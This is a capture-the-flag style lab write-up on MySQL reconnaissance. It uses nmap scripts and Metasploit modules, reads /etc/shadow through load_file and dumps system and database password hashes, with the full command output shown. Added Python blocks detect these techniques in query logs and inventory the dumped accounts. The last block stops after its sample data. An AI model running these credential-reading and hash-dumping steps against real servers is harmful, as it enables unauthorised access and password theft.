MySQL
ip a
inet 192.125.250.2/24
nmap 192.125.250.3
PORT STATE SERVICE
3306/tcp open mysql
nmap 192.125.250.3 -sV -p 3306
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.5.62-0ubuntu0.14.04.1
mysql -h 192.125.250.3 -u root
MySQL [(none)]> show databases;
MySQL [(none)]> use books;
MySQL [books]> select count(*) from authors;
MySQL [books]> select * from authors;
MySQL [books]> help
MySQL [books]> exit
setg
Sets a global variable for the whole Metasploit session.
msfconsole
use auxiliary/scanner/mysql/mysql_writable_dirs
options
set dir_list /usr/share/metasploit-framework/data/wordlists/directory.txt
setg rhosts 192.125.250.3
set verbose false
advanced
set password ""
options
run
[*] 192.125.250.3:3306 - Checking /tmp...
[+] 192.125.250.3:3306 - /tmp is writeable
[*] 192.125.250.3:3306 - Checking /root...
[+] 192.125.250.3:3306 - /root is writeable
use auxiliary/scanner/mysql/mysql_hashdump
set username root
set password ""
options
exploit
exit
mysql -h 192.125.250.3 -u root
MySQL [(none)] > select load_file("/etc/shadow");
MySQL [(none)] > exit
Checks for a MySQL server with an empty password for root or anonymous.
nmap 192.125.250.3 -sV -p 3306 --script=mysql-empty-password
Connects to a MySQL server and prints information such as the protocol and version numbers, thread ID, status, capabilities and the password salt.
If service detection was performed and the server appears to be blocking our host, or is blocked because of too many connections, this script will not run (see the port rule).
InteractiveClient
nmap 192.125.250.3 -sV -p 3306 --script=mysql-info
Attempts to list all users on a MySQL server.
nmap 192.125.250.3 -sV -p 3306 --script=mysql-users --script-args="mysqluser='root',mysqlpass=''"
Attempts to list all databases on a MySQL server.
nmap 192.125.250.3 -sV -p 3306 --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''"
Attempts to show all variables on a MySQL server.
datadir: /var/lib/mysql/
nmap 192.125.250.3 -sV -p 3306 --script=mysql-variables --script-args="mysqluser='root',mysqlpass=''"
Audits the MySQL database server security configuration against parts of the CIS MySQL v1.0.2 benchmark (the engine can be used for other MySQL audits by creating appropriate audit files).
nmap 192.125.250.3 -sV -p 3306 --script=mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'"
Dumps the password hashes from a MySQL server in a format suitable for cracking by tools such as John the Ripper. Appropriate database privileges (root) are required.
The username and password arguments take precedence over credentials discovered by the mysql-brute and mysql-empty-password scripts.
nmap 192.125.250.3 -sV -p 3306 --script=mysql-dump-hashes --script-args="username='root',password=''"
Runs a query against a MySQL database and returns the results as a table.
nmap 192.125.250.3 -sV -p 3306 --script=mysql-query --script-args="query='select count(*) from books.authors;',username='root',password=''"
MySQL Recon: Basics
Overview
In this challenge we will look at the basics of MySQL server reconnaissance. Please start the lab and answer the following questions:
Questions
- What is the version of the MySQL server?
- What command is used to connect to the remote MySQL database?
- How many databases are present on the database server?
- How many records are present in the table “authors”? This table is present inside the “books” database.
- Dump the schema of all databases from the server using a suitable Metasploit module.
- How many of the directories in /usr/share/metasploit-framework/data/wordlists/directory.txt are writable? List the names.
- How many of the sensitive files in /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt are readable? List the names.
- Find the system password hash for the user “root”.
- How many database users are present on the database server? List their names and password hashes.
- Check whether anonymous login is allowed on the MySQL server.
- Check whether the “InteractiveClient” capability is supported on the MySQL server.
- Enumerate the users present on the MySQL database server using the mysql-users nmap script.
- List all databases stored on the MySQL server using an nmap script.
- Find the data directory used by the MySQL server using an nmap script.
- Check whether file privileges are granted to non-admin users using the mysql-audit nmap script.
- Dump all user hashes using an nmap script.
- Find the number of records stored in the table “authors” of the database “books” on the MySQL server using the mysql-query nmap script.
Instructions:
- This lab is dedicated to you! No other users are on this network :)
- Once you start the lab, you will have access to a root terminal of a Kali instance
- Your Kali has an interface with IP address 192.X.Y.Z. Run “ip addr” to find the values of X and Y.
- The target machine should be located at IP address 192.X.Y.3.
- Do not attack the gateway located at IP address 192.X.Y.1
My own approach
In this challenge we will look at the basics of MySQL server reconnaissance. Please start the lab and answer the following questions:
root@attackdefense:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: ip_vti0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000
link/ipip 0.0.0.0 brd 0.0.0.0
31868: eth0@if31869: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:0a:01:00:09 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 10.1.0.9/16 brd 10.1.255.255 scope global eth0
valid_lft forever preferred_lft forever
31871: eth1@if31872: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:c0:29:3f:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 192.41.63.2/24 brd 192.41.63.255 scope global eth1
valid_lft forever preferred_lft forever
root@attackdefense:~# nmap 192.41.63.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-26 01:12 UTC
Nmap scan report for target-1 (192.41.63.3)
Host is up (0.0000090s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
3306/tcp open mysql
MAC Address: 02:42:C0:29:3F:03 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
Questions
What is the version of MySQL server?
MySQL 5.5.62-0ubuntu0.14.04.1
root@attackdefense:~# nmap 192.41.63.3 -p 3306 -sV
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-26 01:13 UTC
Nmap scan report for target-1 (192.41.63.3)
Host is up (0.000036s latency).
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.5.62-0ubuntu0.14.04.1
MAC Address: 02:42:C0:29:3F:03 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds
What command is used to connect to the remote MySQL database?
root@attackdefense:~# mysql -h 192.41.63.3 -u root
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 44
Server version: 5.5.62-0ubuntu0.14.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]>
How many databases are present on the database server?
11
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| books |
| data |
| mysql |
| password |
| performance_schema |
| secret |
| store |
| upload |
| vendors |
| videos |
+--------------------+
11 rows in set (0.001 sec)
How many records are present in table “authors”? This table is present inside the “books” database.
10
MySQL [(none)]> use books;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [books]> show tables;
+-----------------+
| Tables_in_books |
+-----------------+
| authors |
+-----------------+
1 row in set (0.000 sec)
MySQL [books]> select count(*) from authors;
+----------+
| count(*) |
+----------+
| 10 |
+----------+
1 row in set (0.000 sec)
MySQL [books]> select * from authors;
+----+------------+-----------+-----------------------------+------------+---------------------+
| id | first_name | last_name | email | birthdate | added |
+----+------------+-----------+-----------------------------+------------+---------------------+
| 1 | Gregoria | Lowe | gutmann.rebekah@example.net | 1982-03-09 | 1983-01-11 11:25:43 |
| 2 | Ona | Anderson | ethelyn02@example.net | 1980-06-02 | 1972-05-05 07:26:52 |
| 3 | Emile | Lakin | rippin.freda@example.com | 1979-04-06 | 2010-05-30 20:03:07 |
| 4 | Raul | Barton | mschiller@example.com | 1976-05-06 | 1979-02-08 12:32:29 |
| 5 | Sofia | Collier | rodrigo34@example.net | 1978-06-09 | 1991-05-01 10:02:54 |
| 6 | Wellington | Fay | jared98@example.com | 2011-08-11 | 1992-05-27 23:20:20 |
| 7 | Garnet | Braun | hickle.howell@example.net | 1990-04-27 | 2010-04-13 09:48:36 |
| 8 | Alessia | Kuphal | skiles.reggie@example.net | 1978-04-06 | 2014-08-22 21:23:00 |
| 9 | Deven | Carroll | savanah.zulauf@example.net | 2007-02-15 | 1998-02-16 11:45:32 |
| 10 | Issac | Stanton | ozella10@example.net | 2013-10-13 | 1976-12-09 13:18:45 |
+----+------------+-----------+-----------------------------+------------+---------------------+
10 rows in set (0.000 sec)
Dump the schema of all databases from the server using a suitable Metasploit module.
This module extracts schema information from a MySQL database server.
msf5 > use auxiliary/scanner/mysql/mysql_schemadump
msf5 auxiliary(scanner/mysql/mysql_schemadump) > show options
Module options (auxiliary/scanner/mysql/mysql_schemadump):
Name Current Setting Required Description
---- --------------- -------- -----------
DISPLAY_RESULTS true yes Display the Results to the Screen
PASSWORD no The password for the specified username
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads
USERNAME no The username to authenticate as
msf5 auxiliary(scanner/mysql/mysql_schemadump) > setg RHOSTS 192.41.63.3
RHOSTS => 192.41.63.3
msf5 auxiliary(scanner/mysql/mysql_schemadump) > set USERNAME root
USERNAME => root
msf5 auxiliary(scanner/mysql/mysql_schemadump) > run
[+] 192.41.63.3:3306 - Schema stored in: /root/.msf4/loot/20220826013404_default_192.41.63.3_mysql_schema_358644.txt
[+] 192.41.63.3:3306 - MySQL Server Schema
Host: 192.41.63.3
Port: 3306
====================
---
- DBName: books
Tables:
- TableName: authors
Columns:
- ColumnName: id
ColumnType: int(11)
- ColumnName: first_name
ColumnType: varchar(50)
- ColumnName: last_name
ColumnType: varchar(50)
- ColumnName: email
ColumnType: varchar(100)
- ColumnName: birthdate
ColumnType: date
- ColumnName: added
ColumnType: timestamp
- DBName: data
Tables: []
- DBName: password
Tables: []
- DBName: secret
Tables: []
- DBName: store
Tables: []
- DBName: upload
Tables: []
- DBName: vendors
Tables: []
- DBName: videos
Tables: []
[*] 192.41.63.3:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
How many of the directories present in /usr/share/metasploit-framework/data/wordlists/directory.txt are writable? List the names.
/tmp, /root
MySQL Directory Write Test
Enumerates writable directories using the MySQL SELECT INTO DUMPFILE feature; for more information, see the URLs in the references. Note: for every writable directory found, a file with the specified FILE_NAME containing the text "test" will be written to that directory.
msf5 auxiliary(scanner/mysql/mysql_schemadump) > use auxiliary/scanner/mysql/mysql_writable_dirs
msf5 auxiliary(scanner/mysql/mysql_writable_dirs) > show options
Module options (auxiliary/scanner/mysql/mysql_writable_dirs):
Name Current Setting Required Description
---- --------------- -------- -----------
DIR_LIST yes List of directories to test
FILE_NAME kFhBymFR yes Name of file to write
PASSWORD no The password for the specified username
RHOSTS 192.41.63.3 yes The target address range or CIDR identifier
RPORT 3306 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads
USERNAME root yes The username to authenticate as
msf5 auxiliary(scanner/mysql/mysql_writable_dirs) > set DIR_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt
DIR_LIST => /usr/share/metasploit-framework/data/wordlists/directory.txt
msf5 auxiliary(scanner/mysql/mysql_writable_dirs) > run
[!] 192.41.63.3:3306 - For every writable directory found, a file called kFhBymFR with the text test will be written to the directory.
[*] 192.41.63.3:3306 - Login...
[*] 192.41.63.3:3306 - Checking /tmp...
[+] 192.41.63.3:3306 - /tmp is writeable
[*] 192.41.63.3:3306 - Checking /etc/passwd...
[!] 192.41.63.3:3306 - Can't create/write to file '/etc/passwd/kFhBymFR' (Errcode: 20)
[*] 192.41.63.3:3306 - Checking /etc/shadow...
[!] 192.41.63.3:3306 - Can't create/write to file '/etc/shadow/kFhBymFR' (Errcode: 20)
[*] 192.41.63.3:3306 - Checking /root...
[+] 192.41.63.3:3306 - /root is writeable
[*] 192.41.63.3:3306 - Checking /home...
[!] 192.41.63.3:3306 - Can't create/write to file '/home/kFhBymFR' (Errcode: 13)
[*] 192.41.63.3:3306 - Checking /etc...
[!] 192.41.63.3:3306 - Can't create/write to file '/etc/kFhBymFR' (Errcode: 13)
[*] 192.41.63.3:3306 - Checking /etc/hosts...
[!] 192.41.63.3:3306 - Can't create/write to file '/etc/hosts/kFhBymFR' (Errcode: 20)
[*] 192.41.63.3:3306 - Checking /usr/share...
[!] 192.41.63.3:3306 - Can't create/write to file '/usr/share/kFhBymFR' (Errcode: 13)
[*] 192.41.63.3:3306 - Checking /etc/config...
[!] 192.41.63.3:3306 - Can't create/write to file '/etc/config/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /data...
[!] 192.41.63.3:3306 - Can't create/write to file '/data/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /webdav...
[!] 192.41.63.3:3306 - Can't create/write to file '/webdav/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /doc...
[!] 192.41.63.3:3306 - Can't create/write to file '/doc/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /icons...
[!] 192.41.63.3:3306 - Can't create/write to file '/icons/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /manual...
[!] 192.41.63.3:3306 - Can't create/write to file '/manual/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /pro...
[!] 192.41.63.3:3306 - Can't create/write to file '/pro/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /secure...
[!] 192.41.63.3:3306 - Can't create/write to file '/secure/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /poc...
[!] 192.41.63.3:3306 - Can't create/write to file '/poc/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /pro...
[!] 192.41.63.3:3306 - Can't create/write to file '/pro/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /dir...
[!] 192.41.63.3:3306 - Can't create/write to file '/dir/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /Benefits...
[!] 192.41.63.3:3306 - Can't create/write to file '/Benefits/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /Data...
[!] 192.41.63.3:3306 - Can't create/write to file '/Data/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /Invitation...
[!] 192.41.63.3:3306 - Can't create/write to file '/Invitation/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /Office...
[!] 192.41.63.3:3306 - Can't create/write to file '/Office/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /Site...
[!] 192.41.63.3:3306 - Can't create/write to file '/Site/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /Admin...
[!] 192.41.63.3:3306 - Can't create/write to file '/Admin/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /etc...
[!] 192.41.63.3:3306 - Can't create/write to file '/etc/kFhBymFR' (Errcode: 13)
[*] 192.41.63.3:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
How many of the sensitive files present in /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt are readable? List the names.
10
/etc/passwd
/etc/shadow
/etc/group
/etc/mysql/my.cnf
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/issue
/etc/fstab
/proc/version
MySQL File/Directory Enumerator
Enumerates files and directories using the MySQL load_file feature; for more information, see the URLs in the references.
msf5 auxiliary(scanner/mysql/mysql_writable_dirs) > use auxiliary/scanner/mysql/mysql_file_enum
msf5 auxiliary(scanner/mysql/mysql_file_enum) > options
Module options (auxiliary/scanner/mysql/mysql_file_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE_NAME mysql yes Name of database to use
FILE_LIST yes List of directories to enumerate
PASSWORD no The password for the specified username
RHOSTS 192.41.63.3 yes The target address range or CIDR identifier
RPORT 3306 yes The target port (TCP)
TABLE_NAME NqkHEJOY yes Name of table to use - Warning, if the table already exists its contents will be corrupted
THREADS 1 yes The number of concurrent threads
USERNAME root yes The username to authenticate as
msf5 auxiliary(scanner/mysql/mysql_file_enum) > set FILE_LIST /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt
FILE_LIST => /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt
msf5 auxiliary(scanner/mysql/mysql_file_enum) > run
[+] 192.41.63.3:3306 - /etc/passwd is a file and exists
[+] 192.41.63.3:3306 - /etc/shadow is a file and exists
[+] 192.41.63.3:3306 - /etc/group is a file and exists
[+] 192.41.63.3:3306 - /etc/mysql/my.cnf is a file and exists
[+] 192.41.63.3:3306 - /etc/hosts is a file and exists
[+] 192.41.63.3:3306 - /etc/hosts.allow is a file and exists
[+] 192.41.63.3:3306 - /etc/hosts.deny is a file and exists
[+] 192.41.63.3:3306 - /etc/issue is a file and exists
[+] 192.41.63.3:3306 - /etc/fstab is a file and exists
[+] 192.41.63.3:3306 - /proc/version is a file and exists
[*] 192.41.63.3:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Find the system password hash for user “root”.
S1eBFuRRxwD7qEcUIjHxV7Rkj9OXaIGbIOiHsjPZF2uGmGBjRQ3rrQY3/6M.fWHRBHRntsKhgqnClY2.KC.vA/
MySQL [(none)]> select load_file("/etc/shadow");
root:$6$eoOI5IAu$S1eBFuRRxwD7qEcUIjHxV7Rkj9OXaIGbIOiHsjPZF2uGmGBjRQ3rrQY3/6M.fWHRBHRntsKhgqnClY2.KC.vA/:17861:0:99999:7:::
daemon:*:17850:0:99999:7:::
bin:*:17850:0:99999:7:::
sys:*:17850:0:99999:7:::
sync:*:17850:0:99999:7:::
games:*:17850:0:99999:7:::
man:*:17850:0:99999:7:::
lp:*:17850:0:99999:7:::
mail:*:17850:0:99999:7:::
news:*:17850:0:99999:7:::
uucp:*:17850:0:99999:7:::
proxy:*:17850:0:99999:7:::
www-data:*:17850:0:99999:7:::
backup:*:17850:0:99999:7:::
list:*:17850:0:99999:7:::
irc:*:17850:0:99999:7:::
gnats:*:17850:0:99999:7:::
nobody:*:17850:0:99999:7:::
libuuid:!:17850:0:99999:7:::
syslog:*:17850:0:99999:7:::
mysql:!:17857:0:99999:7:::
dbadmin:$6$vZ3Fv3x6$qdB/lOAC1EtlKEC2H8h5f7t33j65WDbHHV50jloFkxFBeQC8QkdbQKpHEp/BkVMQD2C2AFPkYW3.W7jMlMbl5.:17861:0:99999:7:::
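The three file-system steps above (mysql_writable_dirs writing through SELECT ... INTO DUMPFILE, mysql_file_enum probing through LOAD DATA INFILE, and the direct load_file("/etc/shadow") read) all leave distinctive statements in the server's query log, so the defender's counterpart is a log rule. The following Python is an added example, not code from this write-up or from Metasploit; the log lines are constructed in the layout of a MySQL 5.5 general log (which was OFF on this target), and the exact statements the modules send are assumed to resemble the ones shown.

```python
"""Flag file-system and credential-table access in a MySQL general log."""
import re
from dataclasses import dataclass

# Constructed sample in the layout of a MySQL 5.5 general log (log_output=FILE),
# modelled on the steps in this write-up. Hypothetical: the lab host had
# general_log OFF, so nothing like this was actually recorded there.
SAMPLE_GENERAL_LOG = """\
Time                 Id Command    Argument
220826  1:20:11\t   44 Connect\troot@192.41.63.2 on 
\t\t   44 Query\tshow databases
\t\t   44 Query\tselect count(*) from books.authors
\t\t   44 Query\tselect load_file("/etc/shadow")
220826  1:34:04\t   51 Connect\troot@192.41.63.2 on 
\t\t   51 Query\tSELECT 'test' INTO DUMPFILE '/tmp/kFhBymFR'
\t\t   51 Query\tLOAD DATA INFILE '/etc/passwd' INTO TABLE mysql.NqkHEJOY
\t\t   51 Query\tSELECT user, password FROM mysql.user
\t\t   51 Quit\t
"""

# One general-log record: optional timestamp, connection id, command, argument.
LINE_RE = re.compile(
    r"^(?:\d{6}\s+\d{1,2}:\d{2}:\d{2})?\s*(?P<id>\d+) (?P<command>\w+)\t(?P<arg>.*)$"
)

# Statement patterns that correspond to the techniques used in this write-up.
RULES = [
    (re.compile(r"\bload_file\s*\(", re.I), "file read via LOAD_FILE()"),
    (re.compile(r"\binto\s+(?:out|dump)file\b", re.I), "file write via INTO OUTFILE/DUMPFILE"),
    (re.compile(r"\bload\s+data\s+(?:local\s+)?infile\b", re.I), "file read via LOAD DATA INFILE"),
    (re.compile(r"\bfrom\s+mysql\.user\b", re.I), "credential table read (mysql.user)"),
]


@dataclass
class Finding:
    conn_id: int
    account: str   # user@host taken from the connection's Connect record
    rule: str
    query: str


def scan_general_log(text: str) -> list:
    """Return one Finding per logged statement that matches a rule."""
    accounts = {}   # connection id -> user@host
    findings = []
    for line in text.splitlines():
        match = LINE_RE.match(line)
        if match is None:           # header line or unparseable record
            continue
        conn_id = int(match["id"])
        command, arg = match["command"], match["arg"]
        if command == "Connect":
            # Connect argument looks like 'root@192.41.63.2 on <db>'
            accounts[conn_id] = arg.split(" on", 1)[0].strip()
            continue
        if command != "Query":
            continue
        for pattern, rule in RULES:
            if pattern.search(arg):
                findings.append(Finding(conn_id, accounts.get(conn_id, "?"), rule, arg))
    return findings


def per_account(findings: list) -> dict:
    """Count matches per account so a burst from one login stands out."""
    counts = {}
    for finding in findings:
        counts[finding.account] = counts.get(finding.account, 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_general_log(SAMPLE_GENERAL_LOG)
    for hit in hits:
        print("conn %d %-18s %-40s %s" % (hit.conn_id, hit.account, hit.rule, hit.query))
    print(per_account(hits))
```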
How many database users are present on the database server? List their names and password hashes.
MySQL Password Hashdump
This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking.
msf5 auxiliary(scanner/mysql/mysql_file_enum) > use auxiliary/scanner/mysql/mysql_hashdump
msf5 auxiliary(scanner/mysql/mysql_hashdump) > show options
Module options (auxiliary/scanner/mysql/mysql_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS 192.41.63.3 yes The target address range or CIDR identifier
RPORT 3306 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads
USERNAME no The username to authenticate as
msf5 auxiliary(scanner/mysql/mysql_hashdump) > set USERNAME root
USERNAME => root
msf5 auxiliary(scanner/mysql/mysql_hashdump) > run
[+] 192.41.63.3:3306 - Saving HashString as Loot: root:
[+] 192.41.63.3:3306 - Saving HashString as Loot: root:
[+] 192.41.63.3:3306 - Saving HashString as Loot: root:
[+] 192.41.63.3:3306 - Saving HashString as Loot: root:
[+] 192.41.63.3:3306 - Saving HashString as Loot: debian-sys-maint:*CDDA79A15EF590ED57BB5933ECD27364809EE90D
[+] 192.41.63.3:3306 - Saving HashString as Loot: root:
[+] 192.41.63.3:3306 - Saving HashString as Loot: filetest:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[+] 192.41.63.3:3306 - Saving HashString as Loot: ultra:*827EC562775DC9CE458689D36687DCED320F34B0
[+] 192.41.63.3:3306 - Saving HashString as Loot: guest:*17FD2DDCC01E0E66405FB1BA16F033188D18F646
[+] 192.41.63.3:3306 - Saving HashString as Loot: sigver:*027ADC92DD1A83351C64ABCD8BD4BA16EEDA0AB0
[+] 192.41.63.3:3306 - Saving HashString as Loot: udadmin:*E6DEAD2645D88071D28F004A209691AC60A72AC9
[+] 192.41.63.3:3306 - Saving HashString as Loot: sysadmin:*46CFC7938B60837F46B610A2D10C248874555C14
[*] 192.41.63.3:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
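A hashdump listing like the one above becomes useful once it is turned into an account inventory: which accounts have no password at all, whether an anonymous (empty-username) account exists, and whether any hash is in the weak pre-4.1 format. The following Python is an added example, not code from this write-up or from Metasploit; the sample input is the loot lines printed above.

```python
"""Turn mysql_hashdump loot lines into an account inventory."""
import re
from collections import defaultdict

# Constructed sample: the loot lines the module printed above. mysql.user is
# keyed by (user, host) and the module prints one user:hash line per row without
# the host, which is why root appears five times.
HASHDUMP_OUTPUT = """\
[+] 192.41.63.3:3306 - Saving HashString as Loot: root:
[+] 192.41.63.3:3306 - Saving HashString as Loot: root:
[+] 192.41.63.3:3306 - Saving HashString as Loot: root:
[+] 192.41.63.3:3306 - Saving HashString as Loot: root:
[+] 192.41.63.3:3306 - Saving HashString as Loot: debian-sys-maint:*CDDA79A15EF590ED57BB5933ECD27364809EE90D
[+] 192.41.63.3:3306 - Saving HashString as Loot: root:
[+] 192.41.63.3:3306 - Saving HashString as Loot: filetest:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[+] 192.41.63.3:3306 - Saving HashString as Loot: ultra:*827EC562775DC9CE458689D36687DCED320F34B0
[+] 192.41.63.3:3306 - Saving HashString as Loot: guest:*17FD2DDCC01E0E66405FB1BA16F033188D18F646
[+] 192.41.63.3:3306 - Saving HashString as Loot: sigver:*027ADC92DD1A83351C64ABCD8BD4BA16EEDA0AB0
[+] 192.41.63.3:3306 - Saving HashString as Loot: udadmin:*E6DEAD2645D88071D28F004A209691AC60A72AC9
[+] 192.41.63.3:3306 - Saving HashString as Loot: sysadmin:*46CFC7938B60837F46B610A2D10C248874555C14
"""

LOOT_RE = re.compile(r"Saving HashString as Loot: (?P<user>[^:]*):(?P<hash>\S*)")


def classify_hash(stored: str) -> str:
    """Name the format MySQL used for a stored password value."""
    if stored == "":
        return "empty"                  # no password set: the account logs in without one
    if re.fullmatch(r"\*[0-9A-F]{40}", stored):
        return "mysql_native_password"  # '*' + SHA1(SHA1(password)), MySQL 4.1 and later
    if re.fullmatch(r"[0-9a-f]{16}", stored):
        return "pre-4.1"                # OLD_PASSWORD() format, far weaker
    return "unknown"


def parse_hashdump(text: str) -> dict:
    """Return {user: [hash, ...]} with one hash per mysql.user row, in output order."""
    accounts = defaultdict(list)
    for line in text.splitlines():
        match = LOOT_RE.search(line)
        if match:
            accounts[match["user"]].append(match["hash"])
    return dict(accounts)


def account_findings(accounts: dict) -> dict:
    """Defender's summary: password-less, anonymous and weak-hash accounts."""
    return {
        "distinct_users": sorted(accounts),
        "rows": sum(len(hashes) for hashes in accounts.values()),
        "empty_password": sorted(u for u, hashes in accounts.items()
                                 if any(h == "" for h in hashes)),
        "anonymous": [u for u in accounts if u == ""],
        "weak_hash": sorted(u for u, hashes in accounts.items()
                            if any(classify_hash(h) == "pre-4.1" for h in hashes)),
    }


if __name__ == "__main__":
    report = account_findings(parse_hashdump(HASHDUMP_OUTPUT))
    for key, value in report.items():
        print("%-16s %s" % (key, value))
```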
Check whether anonymous login is allowed on MySQL Server.
No, it is not allowed.
Checks for a MySQL server with an empty password for root or anonymous.
root@attackdefense:~# nmap -sV --script=mysql-empty-password 192.41.63.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-26 03:13 UTC
Nmap scan report for target-1 (192.41.63.3)
Host is up (0.0000090s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.5.62-0ubuntu0.14.04.1
| mysql-empty-password:
|_ root account has empty password
MAC Address: 02:42:C0:29:3F:03 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds
Check whether “InteractiveClient” capability is supported on the MySQL server.
Yes, it is supported on the MySQL server.
Connects to a MySQL server and prints information such as the protocol and version numbers, thread ID, status, capabilities and the password salt.
If service detection was performed and the server appears to be blocking our host, or is blocked because of too many connections, this script will not run (see the port rule).
root@attackdefense:~# nmap 192.41.63.3 -p 3306 -sV --script=mysql-info
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-26 03:19 UTC
Nmap scan report for target-1 (192.41.63.3)
Host is up (0.000076s latency).
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.5.62-0ubuntu0.14.04.1
| mysql-info:
| Protocol: 10
| Version: 5.5.62-0ubuntu0.14.04.1
| Thread ID: 54
| Capabilities flags: 63487
| Some Capabilities: FoundRows, LongPassword, ODBCClient, IgnoreSigpipes, InteractiveClient, LongColumnFlag, IgnoreSpaceBeforeParenthesis, SupportsCompression, Support41Auth, ConnectWithDatabase, SupportsLoadDataLocal, SupportsTransactions, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, Speaks41ProtocolNew, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: |xcigGmod*@Cn!XxrV6H
|_ Auth Plugin Name: 96
MAC Address: 02:42:C0:29:3F:03 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds
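mysql-info prints the raw handshake bitmask (Capabilities flags: 63487) next to a partial name list, and the InteractiveClient question above is answered by a single bit of it. The following Python is an added example, not part of this write-up or of nmap: it maps the lower 16 capability bits of the MySQL client/server protocol to the names mysql-info uses, and draws the hardening conclusions a defender can take from the unauthenticated handshake alone.

```python
"""Decode the capability bitmask shown by nmap's mysql-info script."""
import re

# Lower 16 bits of the server capability flags sent in the MySQL client/server
# protocol handshake, named the way nmap's mysql-info script names them.
CAPABILITIES = {
    0x0001: "LongPassword",
    0x0002: "FoundRows",
    0x0004: "LongColumnFlag",
    0x0008: "ConnectWithDatabase",
    0x0010: "DontAllowDatabaseTableColumn",
    0x0020: "SupportsCompression",
    0x0040: "ODBCClient",
    0x0080: "SupportsLoadDataLocal",
    0x0100: "IgnoreSpaceBeforeParenthesis",
    0x0200: "Speaks41ProtocolNew",
    0x0400: "InteractiveClient",
    0x0800: "SwitchToSSLAfterHandshake",
    0x1000: "IgnoreSigpipes",
    0x2000: "SupportsTransactions",
    0x4000: "Speaks41ProtocolOld",
    0x8000: "Support41Auth",
}

# Constructed sample: the mysql-info block from the scan above, trimmed.
SAMPLE_MYSQL_INFO = """\
| mysql-info:
|   Protocol: 10
|   Version: 5.5.62-0ubuntu0.14.04.1
|   Thread ID: 54
|   Capabilities flags: 63487
|   Status: Autocommit
|_  Auth Plugin Name: 96
"""


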